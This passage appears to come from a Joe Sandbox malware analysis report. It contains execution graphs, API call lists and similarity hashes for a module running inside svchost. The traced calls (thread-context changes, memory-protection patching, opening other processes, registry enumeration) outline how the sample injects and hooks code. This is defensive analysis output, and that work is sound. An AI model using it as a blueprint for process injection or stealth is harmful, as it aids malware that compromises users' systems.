9274->9268 9274->9271 9276 13de2721988 CloseHandle 9275->9276 9277 13de272197a 9275->9277 9276->9274 9277->9276 9540 13de27258c9 9541 13de27258d0 VirtualProtect 9540->9541 9542 13de27258f9 GetLastError 9541->9542 9543 13de27257e0 9541->9543 9542->9543 9544 13de2723ac9 9547 13de2723a16 9544->9547 9545 13de2723a80 9546 13de2723a66 VirtualQuery 9546->9545 9546->9547 9547->9545 9547->9546 9548 13de2723a9a VirtualAlloc 9547->9548 9548->9545 9549 13de2723acb GetLastError 9548->9549 9549->9545 9549->9547 9048 13de27301b0 9049 13de27301e0 9048->9049 9050 13de2730207 9048->9050 9049->9050 9051 13de272d510 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9049->9051 9053 13de27301f4 9049->9053 9052 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9050->9052 9055 13de27302dc 9050->9055 9051->9053 9052->9055 9053->9050 9054 13de2730289 9053->9054 9061 13de2730244 9053->9061 9056 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9054->9056 9058 13de2730410 9055->9058 9060 13de272d398 _invalid_parameter_noinfo 17 API calls 9055->9060 9064 13de2730343 9055->9064 9057 13de273028e 9056->9057 9059 13de272dae0 _invalid_parameter_noinfo 20 API calls 9057->9059 9059->9061 9062 13de2730333 9060->9062 9063 13de272d398 _invalid_parameter_noinfo 17 API calls 9062->9063 9063->9064 9065 13de272d398 17 API calls _invalid_parameter_noinfo 9064->9065 9065->9064 9066 13de27315b0 9067 13de27315cf 9066->9067 9068 13de2731648 9067->9068 9070 13de27315df 9067->9070 9074 13de27281fc 9068->9074 9072 13de2727950 _log10_special IsProcessorFeaturePresent 9070->9072 9073 13de273163e 9072->9073 9077 13de2728210 IsProcessorFeaturePresent 9074->9077 9076 13de272820a 9078 13de2728227 capture_current_context 9077->9078 9078->9076 9550 13de27310b0 9551 13de27310dd 9550->9551 9552 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9551->9552 9557 13de27310f2 _invalid_parameter_noinfo 9551->9557 9553 13de27310e7 9552->9553 
9555 13de272dae0 _invalid_parameter_noinfo 20 API calls 9553->9555 9554 13de2727950 _log10_special IsProcessorFeaturePresent 9556 13de27314b0 9554->9556 9555->9557 9557->9554 9558 13de2725cb3 9559 13de2725cc0 9558->9559 9560 13de2725ccc GetThreadContext 9559->9560 9563 13de2725e2a 9559->9563 9561 13de2725cf2 9560->9561 9560->9563 9561->9563 9564 13de2725d19 9561->9564 9562 13de2725e51 VirtualProtect FlushInstructionCache 9562->9563 9563->9562 9565 13de2725f0e 9563->9565 9568 13de2725d9d 9564->9568 9570 13de2725d76 SetThreadContext 9564->9570 9566 13de2725f2e 9565->9566 9569 13de27243f0 VirtualFree 9565->9569 9567 13de2724e00 3 API calls 9566->9567 9573 13de2725f33 9567->9573 9569->9566 9570->9568 9571 13de2725f87 9574 13de2727950 _log10_special IsProcessorFeaturePresent 9571->9574 9572 13de2725f47 ResumeThread 9572->9573 9573->9571 9573->9572 9575 13de2725fcf 9574->9575 8098 13de2722034 8099 13de2722065 8098->8099 8100 13de272217b 8099->8100 8108 13de2722089 8099->8108 8111 13de2722146 8099->8111 8101 13de27221ef 8100->8101 8102 13de2722180 8100->8102 8104 13de27221f4 8101->8104 8101->8111 8119 13de2722f18 GetProcessHeap HeapAlloc 8102->8119 8107 13de2722f18 11 API calls 8104->8107 8105 13de2722198 8105->8111 8106 13de27220c1 StrCmpNIW 8106->8108 8107->8105 8108->8106 8110 13de27220e8 8108->8110 8108->8111 8110->8108 8112 13de2721bfc 8110->8112 8113 13de2721c23 GetProcessHeap HeapAlloc 8112->8113 8114 13de2721c97 8112->8114 8113->8114 8115 13de2721c5e 8113->8115 8114->8110 8116 13de2721c7f GetProcessHeap HeapFree 8115->8116 8125 13de2721534 8115->8125 8116->8114 8124 13de2722f6b 8119->8124 8120 13de2723029 GetProcessHeap HeapFree 8120->8105 8121 13de2723024 8121->8120 8122 13de2722fb6 StrCmpNIW 8122->8124 8123 13de2721bfc 6 API calls 8123->8124 8124->8120 8124->8121 8124->8122 8124->8123 8126 13de272154e 8125->8126 8129 13de2721584 8125->8129 8127 13de272156d StrCmpW 8126->8127 8128 13de2721565 StrCmpIW 8126->8128 8126->8129 8127->8126 8128->8126 8129->8116 9576 
13de2722ab4 9577 13de2722b11 9576->9577 9578 13de2722b2c 9577->9578 9579 13de27231f8 3 API calls 9577->9579 9579->9578 9278 13de2732031 9279 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9278->9279 9280 13de2732036 9279->9280 9281 13de272dae0 _invalid_parameter_noinfo 20 API calls 9280->9281 9282 13de2732041 9281->9282 10022 13de2722338 10024 13de27223b6 10022->10024 10023 13de27224d3 10024->10023 10025 13de272241b GetFileType 10024->10025 10026 13de272243d 10025->10026 10027 13de2722429 StrCpyW 10025->10027 10028 13de2721a48 4 API calls 10026->10028 10031 13de272244a 10027->10031 10028->10031 10029 13de2723858 StrCmpNIW 10029->10031 10030 13de2723058 4 API calls 10030->10031 10031->10023 10031->10029 10031->10030 10032 13de2721cb4 2 API calls 10031->10032 10032->10031 9283 13de2735c35 9284 13de2728c04 _CallSETranslator 5 API calls 9283->9284 9285 13de2735c4d 9284->9285 9286 13de2728c04 _CallSETranslator 5 API calls 9285->9286 9287 13de2735c68 9286->9287 9288 13de2728c04 _CallSETranslator 5 API calls 9287->9288 9289 13de2735c7c 9288->9289 9290 13de2728c04 _CallSETranslator 5 API calls 9289->9290 9291 13de2735cbe 9290->9291 8197 13de272dc3c 8202 13de272dc4d _invalid_parameter_noinfo 8197->8202 8198 13de272dc9e 8207 13de272dc1c 8198->8207 8199 13de272dc82 HeapAlloc 8201 13de272dc9c 8199->8201 8199->8202 8202->8198 8202->8199 8204 13de272bdcc 8202->8204 8210 13de272be0c 8204->8210 8215 13de272d510 8207->8215 8209 13de272dc25 8209->8201 8213 13de272cf0c EnterCriticalSection 8210->8213 8214 13de2736240 8213->8214 8219 13de272d525 Concurrency::details::SchedulerProxy::DeleteThis 8215->8219 8216 13de272d551 FlsSetValue 8217 13de272d563 8216->8217 8221 13de272d541 _invalid_parameter_noinfo 8216->8221 8231 13de272dc3c 8217->8231 8219->8216 8219->8221 8221->8209 8222 13de272d590 FlsSetValue 8225 13de272d5ae 8222->8225 8226 13de272d59c FlsSetValue 8222->8226 8223 13de272d580 FlsSetValue 8224 13de272d589 8223->8224 8238 13de272dcb4 8224->8238 8243 
13de272d104 8225->8243 8226->8224 8230 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 3 API calls 8230->8221 8236 13de272dc4d _invalid_parameter_noinfo 8231->8236 8232 13de272dc9e 8234 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 8232->8234 8233 13de272dc82 HeapAlloc 8235 13de272d572 8233->8235 8233->8236 8234->8235 8235->8222 8235->8223 8236->8232 8236->8233 8237 13de272bdcc _invalid_parameter_noinfo EnterCriticalSection 8236->8237 8237->8236 8239 13de272dcea 8238->8239 8240 13de272dcb9 HeapFree 8238->8240 8239->8221 8240->8239 8241 13de272dcd4 Concurrency::details::SchedulerProxy::DeleteThis 8240->8241 8242 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 8241->8242 8242->8239 8248 13de272cfdc 8243->8248 8245 13de272d1b6 8251 13de272d05c 8245->8251 8247 13de272d1cb 8247->8230 8249 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8248->8249 8250 13de272cff8 8249->8250 8250->8245 8252 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8251->8252 8253 13de272d078 8252->8253 8256 13de272d2ec 8253->8256 8255 13de272d08e 8255->8247 8257 13de272d334 Concurrency::details::SchedulerProxy::DeleteThis 8256->8257 8258 13de272d308 Concurrency::details::SchedulerProxy::DeleteThis 8256->8258 8257->8255 8258->8257 8260 13de2730d24 8258->8260 8261 13de2730dc0 8260->8261 8264 13de2730d47 8260->8264 8262 13de2730e13 8261->8262 8265 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8261->8265 8326 13de2730ec4 8262->8326 8264->8261 8269 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8264->8269 8271 13de2730d86 8264->8271 8266 13de2730de4 8265->8266 8267 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8266->8267 8270 13de2730df8 8267->8270 8268 13de2730da8 8272 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8268->8272 8275 13de2730d7a 8269->8275 8276 
13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8270->8276 8271->8268 8277 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8271->8277 8273 13de2730db4 8272->8273 8279 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8273->8279 8274 13de2730e1f 8278 13de2730e7e 8274->8278 8283 13de272dcb4 7 API calls Concurrency::details::SchedulerProxy::DeleteThis 8274->8283 8286 13de2733538 8275->8286 8281 13de2730e07 8276->8281 8282 13de2730d9c 8277->8282 8279->8261 8284 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8281->8284 8314 13de2733644 8282->8314 8283->8274 8284->8262 8287 13de2733541 8286->8287 8312 13de273363c 8286->8312 8288 13de273355b 8287->8288 8289 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8287->8289 8290 13de273356d 8288->8290 8291 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8288->8291 8289->8288 8292 13de273357f 8290->8292 8293 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8290->8293 8291->8290 8294 13de2733591 8292->8294 8295 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8292->8295 8293->8292 8296 13de27335a3 8294->8296 8298 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8294->8298 8295->8294 8297 13de27335b5 8296->8297 8299 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8296->8299 8300 13de27335c7 8297->8300 8301 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8297->8301 8298->8296 8299->8297 8302 13de27335d9 8300->8302 8303 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8300->8303 8301->8300 8304 13de27335eb 8302->8304 8305 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8302->8305 8303->8302 8306 13de27335fd 8304->8306 8307 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8304->8307 8305->8304 8308 
13de2733612 8306->8308 8309 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8306->8309 8307->8306 8310 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8308->8310 8311 13de2733627 8308->8311 8309->8308 8310->8311 8311->8312 8313 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8311->8313 8312->8271 8313->8312 8315 13de2733649 8314->8315 8324 13de27336aa 8314->8324 8316 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8315->8316 8317 13de2733662 8315->8317 8316->8317 8318 13de2733674 8317->8318 8320 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8317->8320 8319 13de2733686 8318->8319 8321 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8318->8321 8322 13de2733698 8319->8322 8323 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8319->8323 8320->8318 8321->8319 8322->8324 8325 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8322->8325 8323->8322 8324->8268 8325->8324 8327 13de2730ef5 8326->8327 8328 13de2730ec9 8326->8328 8327->8274 8328->8327 8332 13de27336e4 8328->8332 8331 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8331->8327 8333 13de27336ed 8332->8333 8334 13de2730eed 8332->8334 8368 13de27336b0 8333->8368 8334->8331 8337 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8338 13de2733716 8337->8338 8339 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8338->8339 8340 13de2733724 8339->8340 8341 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8340->8341 8342 13de2733732 8341->8342 8343 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8342->8343 8344 13de2733741 8343->8344 8345 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8344->8345 8346 13de273374d 8345->8346 8347 13de272dcb4 
Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8346->8347 8348 13de2733759 8347->8348 8349 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8348->8349 8350 13de2733765 8349->8350 8351 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8350->8351 8352 13de2733773 8351->8352 8353 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8352->8353 8354 13de2733781 8353->8354 8355 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8354->8355 8356 13de273378f 8355->8356 8357 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8356->8357 8358 13de273379d 8357->8358 8359 13de27336b0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8358->8359 8360 13de27337ac 8359->8360 8361 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8360->8361 8362 13de27337b8 8361->8362 8363 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8362->8363 8364 13de27337c4 8363->8364 8365 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8364->8365 8366 13de27337d0 8365->8366 8367 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8366->8367 8367->8334 8369 13de27336d7 8368->8369 8370 13de27336c6 8368->8370 8369->8337 8370->8369 8371 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8370->8371 8371->8370 9292 13de272783c 9293 13de272785d 9292->9293 9294 13de2727858 9292->9294 9296 13de2727970 9294->9296 9297 13de2727993 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9296->9297 9298 13de2727a07 9296->9298 9297->9298 9298->9293 10033 13de272cb3c 10034 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10033->10034 10035 13de272cb4c 10034->10035 10036 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10035->10036 10037 13de272cb60 10036->10037 10038 13de272dcb4 
Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10037->10038 10039 13de272cb74 10038->10039 10040 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10039->10040 10041 13de272cb88 10040->10041 9085 13de272fda0 GetProcessHeap 9086 13de2735b9f 9087 13de2735bb7 9086->9087 9093 13de2735c22 9086->9093 9088 13de2728c04 _CallSETranslator 5 API calls 9087->9088 9087->9093 9089 13de2735c04 9088->9089 9090 13de2728c04 _CallSETranslator 5 API calls 9089->9090 9091 13de2735c19 9090->9091 9092 13de272cc18 17 API calls 9091->9092 9092->9093 9580 13de2727aa0 9581 13de2727aa9 __scrt_acquire_startup_lock 9580->9581 9583 13de2727aad 9581->9583 9584 13de272c4cc 9581->9584 9585 13de272c4ec 9584->9585 9605 13de272c503 9584->9605 9586 13de272c4f4 9585->9586 9587 13de272c50a 9585->9587 9588 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9586->9588 9589 13de272f200 39 API calls 9587->9589 9590 13de272c4f9 9588->9590 9591 13de272c50f 9589->9591 9592 13de272dae0 _invalid_parameter_noinfo 20 API calls 9590->9592 9615 13de272e8e4 GetModuleFileNameW 9591->9615 9592->9605 9597 13de272c46c 7 API calls 9598 13de272c579 9597->9598 9599 13de272c581 9598->9599 9600 13de272c599 9598->9600 9601 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9599->9601 9602 13de272c2a4 17 API calls 9600->9602 9603 13de272c586 9601->9603 9606 13de272c5b5 9602->9606 9604 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9603->9604 9604->9605 9605->9583 9608 13de272c600 9606->9608 9609 13de272c5e7 9606->9609 9614 13de272c5bb 9606->9614 9607 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9607->9605 9612 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9608->9612 9610 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9609->9610 9611 13de272c5f0 9610->9611 9613 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9611->9613 
9612->9614 9613->9605 9614->9607 9616 13de272e93d 9615->9616 9617 13de272e929 Concurrency::details::SchedulerProxy::DeleteThis 9615->9617 9618 13de272e724 17 API calls 9616->9618 9620 13de272db90 7 API calls 9617->9620 9619 13de272e96b 9618->9619 9622 13de272fb18 4 API calls 9619->9622 9624 13de272e97c 9619->9624 9621 13de272e936 9620->9621 9625 13de2727950 _log10_special IsProcessorFeaturePresent 9621->9625 9622->9624 9633 13de272e7c8 9624->9633 9626 13de272c526 9625->9626 9627 13de272c2a4 9626->9627 9629 13de272c2e2 9627->9629 9631 13de272c34e 9629->9631 9642 13de272f5b0 9629->9642 9630 13de272c43f 9630->9597 9631->9630 9632 13de272f5b0 17 API calls 9631->9632 9632->9631 9634 13de272e807 9633->9634 9636 13de272e7ec 9633->9636 9637 13de272e86a Concurrency::details::SchedulerProxy::DeleteThis 9634->9637 9638 13de272e80c 9634->9638 9635 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9635->9636 9636->9621 9637->9636 9639 13de272db90 7 API calls 9637->9639 9638->9635 9638->9636 9640 13de272e877 9639->9640 9641 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9640->9641 9641->9636 9643 13de272f53c 9642->9643 9644 13de272e724 17 API calls 9643->9644 9645 13de272f560 9644->9645 9645->9629 9094 13de27229a4 9096 13de27229f8 9094->9096 9095 13de2722a13 9096->9095 9098 13de2723144 9096->9098 9099 13de27231da 9098->9099 9101 13de2723169 9098->9101 9099->9095 9100 13de2723858 StrCmpNIW 9100->9101 9101->9099 9101->9100 9102 13de2721ce8 StrCmpIW StrCmpW 9101->9102 9102->9101 9646 13de27214a4 9647 13de27214e6 GetProcessHeap HeapFree GetProcessHeap HeapFree 9646->9647 9648 13de27214c6 GetProcessHeap HeapFree 9646->9648 9649 13de2736180 9647->9649 9648->9647 9648->9648 9650 13de272caa4 9653 13de272c854 9650->9653 9660 13de272c81c 9653->9660 9658 13de272c7d8 7 API calls 9659 13de272c887 9658->9659 9661 13de272c831 9660->9661 9662 13de272c82c 9660->9662 9664 13de272c838 9661->9664 9663 13de272c7d8 7 API calls 9662->9663 9663->9661 
9665 13de272c84d 9664->9665 9666 13de272c848 9664->9666 9665->9658 9667 13de272c7d8 7 API calls 9666->9667 9667->9665 10042 13de2727b2c 10043 13de2727b50 __scrt_acquire_startup_lock 10042->10043 10044 13de272be55 10043->10044 10045 13de272d510 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10043->10045 10046 13de272be7e _invalid_parameter_noinfo 10045->10046
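The execution graph above is a flat token stream: a node is an integer id followed by a hex address and optional label tokens (API names, CRT symbol names, annotations such as "7 API calls"), and an edge is "id->id". The following Python is an added example, not Joe Sandbox code: it parses that format, treats nodes with no incoming edge as the entry function of their cluster, collects the Win32 API names reachable from each entry, and flags analyst-chosen API combinations. The PATTERNS table is an assumption (not the sandbox's own signatures), and SAMPLE is a trimmed excerpt of the graph text reduced to three clusters.

```python
"""Parse a Joe Sandbox execution-graph dump into per-function reachable API sets.

Added example, not Joe Sandbox code. PATTERNS are analyst-chosen assumptions.
"""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")          # '9160->9162'
ADDR_RE = re.compile(r"^[0-9a-f]{8,}$")           # '13de2725cb3'
# Win32 export names are CamelCase with at least one lowercase letter; CRT
# internals ('_invalid_parameter_noinfo', 'std::bad_alloc') and the
# 'N API calls' annotation fail this test and are ignored.
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*$")

# Assumed patterns: every API in the set must be reachable from the entry.
PATTERNS = {
    "thread_context_hijack": {"GetThreadContext", "SetThreadContext", "ResumeThread"},
    "code_patching": {"VirtualProtect", "FlushInstructionCache"},
    "registry_value_enumeration": {"RegOpenKeyExW", "RegEnumValueW"},
    "cross_process_handle": {"OpenProcess", "IsWow64Process"},
}

# Trimmed excerpt of the execution graph (three clusters, same token format).
SAMPLE = """
9558 13de2725cb3 9559 13de2725cc0 9558->9559 9560 13de2725ccc GetThreadContext 9559->9560
9563 13de2725e2a 9559->9563 9561 13de2725cf2 9560->9561 9560->9563 9561->9563 9564 13de2725d19
9561->9564 9562 13de2725e51 VirtualProtect FlushInstructionCache 9562->9563 9563->9562
9565 13de2725f0e 9563->9565 9568 13de2725d9d 9564->9568 9570 13de2725d76 SetThreadContext
9564->9570 9566 13de2725f2e 9565->9566 9569 13de27243f0 VirtualFree 9565->9569
9567 13de2724e00 3 API calls 9566->9567 9573 13de2725f33 9567->9573 9569->9566 9570->9568
9571 13de2725f87 9574 13de2727950 _log10_special IsProcessorFeaturePresent 9571->9574
9572 13de2725f47 ResumeThread 9572->9573 9573->9571 9573->9572 9575 13de2725fcf 9574->9575
8130 13de2721ac4 8135 13de2721630 GetProcessHeap HeapAlloc 8130->8135 8132 13de2721ada Sleep SleepEx
8133 13de2721ad3 8132->8133 8133->8132 8134 13de27215a0 StrCmpIW StrCmpW 8133->8134 8134->8133
8179 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8135->8179 8137 13de2721658
8180 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8137->8180 8139 13de2721669
8181 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8139->8181 8141 13de2721672
8182 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8141->8182 8143 13de272167b
8144 13de2721696 RegOpenKeyExW 8143->8144 8145 13de27218ae 8144->8145 8146 13de27216c8 RegOpenKeyExW
8144->8146 8145->8133 8147 13de27216f1 8146->8147 8183 13de27212bc RegQueryInfoKeyW 8147->8183
8179->8137 8180->8139 8181->8141 8182->8143 8184 13de2721327 GetProcessHeap HeapAlloc 8183->8184
8185 13de272148a RegCloseKey 8183->8185 8186 13de2721352 RegEnumValueW 8184->8186
9266 13de272224c GetProcessIdOfThread GetCurrentProcessId 9267 13de272227d 9266->9267
9268 13de272231a 9266->9268 9273 13de272193c OpenProcess 9267->9273 9271 13de272228f CreateFileW
9271->9268 9272 13de27222d3 WriteFile ReadFile CloseHandle 9271->9272 9272->9268 9274 13de2721991
9273->9274 9275 13de2721968 IsWow64Process 9273->9275 9274->9268 9274->9271
9276 13de2721988 CloseHandle 9275->9276 9277 13de272197a 9275->9277 9276->9274 9277->9276
"""


def parse_graph(text):
    """Return ({id: (address, [labels])}, {id: {successor ids}})."""
    tokens = text.split()
    nodes, edges, current, i = {}, defaultdict(set), None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges[edge.group(1)].add(edge.group(2))
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok                        # new node: '<id> <address>'
            nodes[current] = (tokens[i + 1], [])
            i += 1                               # skip the address token
        elif current is not None:
            nodes[current][1].append(tok)        # label belongs to the open node
        i += 1
    return nodes, edges


def api_names(labels):
    return {t for t in labels if API_RE.match(t)}


def reachable_apis(root, nodes, edges):
    """Depth-first walk collecting Win32 API names on every reachable node."""
    seen, stack, apis = set(), [root], set()
    while stack:
        nid = stack.pop()
        if nid in seen:
            continue
        seen.add(nid)
        if nid in nodes:
            apis |= api_names(nodes[nid][1])
        stack.extend(edges.get(nid, ()))
    return apis


def analyze(text):
    """Map each entry-function address to its reachable APIs and matched patterns."""
    nodes, edges = parse_graph(text)
    targets = {dst for dsts in edges.values() for dst in dsts}
    report = {}
    for nid, (addr, _) in nodes.items():
        if nid in targets:
            continue                             # has a caller: not a cluster entry
        apis = reachable_apis(nid, nodes, edges)
        hits = sorted(name for name, need in PATTERNS.items() if need <= apis)
        report[addr] = {"apis": sorted(apis), "patterns": hits}
    return report


if __name__ == "__main__":
    for addr, info in analyze(SAMPLE).items():
        print(addr, info["patterns"], ", ".join(info["apis"]))
```

Run against the sample, the thread-context cluster at 13de2725cb3 matches both thread_context_hijack and code_patching, the registry walker at 13de2721ac4 matches registry_value_enumeration, and 13de272224c matches cross_process_handle. Feeding the full graph text to analyze() yields one entry per root function; pattern sets are the part to adjust for a given investigation.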

Control-flow Graph of 13de2722034 (basic-block edge list omitted). The function calls 13de2742d70, 13de2722f18, 13de2721bc4 and 13de2721bfc and compares strings with StrCmpNIW.
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: S
• API String ID: 756756679-543223747
• Opcode ID: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
• Instruction ID: 66490ac6ba7d68a9c64cc0d4773b1818ba8c54fde1267231f19a9880e82c7aed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB518BB3B11A248AE761FE25F840BEA6BF4F708784F159535DF051AB84DB36CA52E300

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1683269324-0
                                                                                                                                                                                                                                                • Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction ID: 09d6951cfe52e120f864e029d0e2ce767c0caa2abbe53b2d0ee1bc4b66c716bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB1180B27106458EFB60B721BA457D96FB4BBD4705F148036DD868D292EF3CC354B614

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: GetProcessHeap.KERNEL32 ref: 0000013DE272163B
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: HeapAlloc.KERNEL32 ref: 0000013DE272164A
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE27216BA
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE27216E7
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE2721701
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE2721721
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE272173C
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE272175C
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE2721777
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE2721797
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE27217B2
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE27217D2
                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 0000013DE2721ADF
                                                                                                                                                                                                                                                • SleepEx.KERNELBASE ref: 0000013DE2721AE5
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE27217ED
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE272180D
